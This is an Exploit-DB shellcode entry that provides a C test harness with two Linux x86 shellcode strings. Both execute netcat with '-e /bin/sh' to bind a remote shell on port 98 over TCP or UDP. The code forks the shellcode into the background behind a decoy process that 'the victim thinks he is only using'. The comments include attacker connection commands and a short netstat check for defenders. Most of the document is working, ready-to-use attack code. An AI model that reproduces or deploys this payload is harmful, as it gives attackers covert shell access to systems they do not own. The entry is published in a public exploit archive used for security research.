Linux/x86 - Bind (98/TCP + UDP) Netcat Shell Shellcode (44/52 bytes)

EDB-ID:

40179

CVE:

N/A

EDB Verified:

Author:

Kyzer

Type:

shellcode

Exploit:   /  

Platform:

Linux_x86

Date:

2016-07-29

Vulnerable App: 
#include <stdio.h>
#include <string.h>
#include <unistd.h> //| needed for C "fork"
#include <stdlib.h> //| needed for C "system"


//| Exploit Title: [Linux x86 NetCat bind shell with Port (44, 52 bytes)]
//| Date: [7/28/2016]
//| Exploit Author: [CripSlick]
//| Tested on: [Kali 2.0 x86]
//| Version: [NetCat v1.10-41]

//| ShepherdDowling@gmail.com
//| OffSec ID: OS-20614
//| http://50.112.22.183/


//|=====================================================================================================
//|================================ CripSlick's Short NetCat Bind Shell ================================
//|
//|
//|	Why use CripSlick's NetCat Bind Shell?
//|	Because it is short and that is about the only reason. If you can spare some bytes, I highly 
//|	suggest that you go with my Ncat Bind Shell that has the added benefits of SSL, persistent,
//|	multi-terminal with a password >>>>>>>>>>>>>>	https://www.exploit-db.com/exploits/40061/
//|	Or if you must only rely on syscalls, go >>>> 	https://www.exploit-db.com/exploits/40122/ 
//|	for my bind shell that is also, persistent, multiterminal with a password (Ncat is better 
//|	due to SSL, so if you know the victim has it on their machine use it.)
//|	
//|
//|	Sometimes we don't have the luxury of being able to have the other goodies so you must make do	
//|	with a less powerful approach to at least get your foot in the door, and that is why I made this.
//|	
//|	Defender Bash Script	
//|	netstat -an | grep -A 50 Recv-Q | egrep "tcp|udp"
//|
//|	I came up with this bash script because I wanted to be able to see who was spying that included
//|	TCP listening, TCP established, UDP listening, & UDP established.
//|	I found it annoying that some people needed to run a new script for every state so I fixed that.
//|	the "-A 50" means your bash script will hold up to 50 connections.
//|	If you need more connections increase the number, and if the scan is slow, decrease the number.
	    



#define PORT 		"\x39\x38"	// FORWARD BYTE ORDER (ASCII TO HEX)
//|					PORT:98 		

//| Specifying the PROTOCOL Only Applies to CODE2
//#define PROTOCOL	"\x76\x76"	// TCP & IS terminal visible
#define PROTOCOL	"\x75\x75"	// UDP & NOT terminal visible	

//|=====================!!!CHOSE ONLY ONE SHELLCODE!!!============================
//| ==============================================================================
//| CODE1 Random Port, real ghetto but only 44 bytes!!
//| ==============================================================================
//| Attacker Finds Port: nmap 10.1.1.4 -p-
//| Attacker Connects via TCP: nc <IP> <PORT>
//| Defender : netstat -an | grep -A 50 Recv-Q | egrep "tcp|udp"


unsigned char CODE1[] = //replace CODE1 for both CODEX   <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

"\x31\xc0\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x65\x2f\x62\x69\x68\x2d"
"\x6c\x76\x76\x89\xe6\x50\x68\x2f\x2f\x6e\x63\x68\x2f\x62\x69\x6e\x89"
"\xe3\x50\x56\x53\x89\xe1\xb0\x0b\xcd\x80"
;


//|=====================!!!CHOSE ONLY ONE SHELLCODE!!!============================
//| ==============================================================================
//| CODE2 with port and still only 52 bytes
//| ==============================================================================
//| Attacker Connects via TCP: nc <IP> <PORT>
//| Attacker Connects via UDP: nc -u <IP> <PORT>
//| Defender : netstat -an | grep -A 50 Recv-Q | egrep "tcp|udp"


unsigned char CODE2[] = //replace CODE2 for both CODEX   <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<


"\x31\xdb\xf7\xe3\x68\x2d\x70"PORT"\x89\xe7\x50\x68\x6e\x2f\x73\x68\x68"
"\x65\x2f\x62\x69\x68\x2d\x6c"PROTOCOL"\x89\xe6\x50\x68\x2f\x2f\x6e\x63"
"\x68\x2f\x62\x69\x6e\x89\xe3\x50\x57\x56\x53\x89\xe1\xb0\x0b\xcd\x80"
;



//|========================== VOID SHELLCODE ======================================
void SHELLCODE()
{
//	This part floods the registers to make sure the shellcode will always run
	__asm__("mov $0xAAAAAAAA, %eax\n\t"
		"mov %eax, %ebx\n\t" "mov %eax, %ecx\n\t" "mov %eax, %edx\n\t" 
		"mov %eax, %esi\n\t" "mov %eax, %edi\n\t" "mov %eax, %ebp\n\t" 
		"call CODE2");  //1st CODEX<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
}

//|========================== VOID printBytes =====================================
void printBytes()
{
printf("CripSlick's code is %d Bytes Long\n",
		strlen(CODE2)); //2nd CODEX<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
}


//|============================== Int main ========================================
int main ()
{
	
//	IMPORTANT> replace CODEX  the "unsigned char" variable  above
//	> This needs to be done twice (for string count + code to use)

int pid = fork();  		// fork start
    if(pid == 0){ 		// pid always starts at 0
	
	SHELLCODE();		// launch void SHELLCODE
						// this is to represent a scenario where you bind to a good program
						// you always want your shellcode to run first	
	
	}else if(pid > 0){	// pid will always be greater than 0 after the 1st process
						// this argument will always be satisfied
	
	printBytes();		// launch printBYTES
						// pretend that this is the one the victim thinks he is only using
	}
return 0;				// satisfy int main
system("exit");			// keeps our shellcode a daemon. This only works with C0DE2 as UDP
}
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services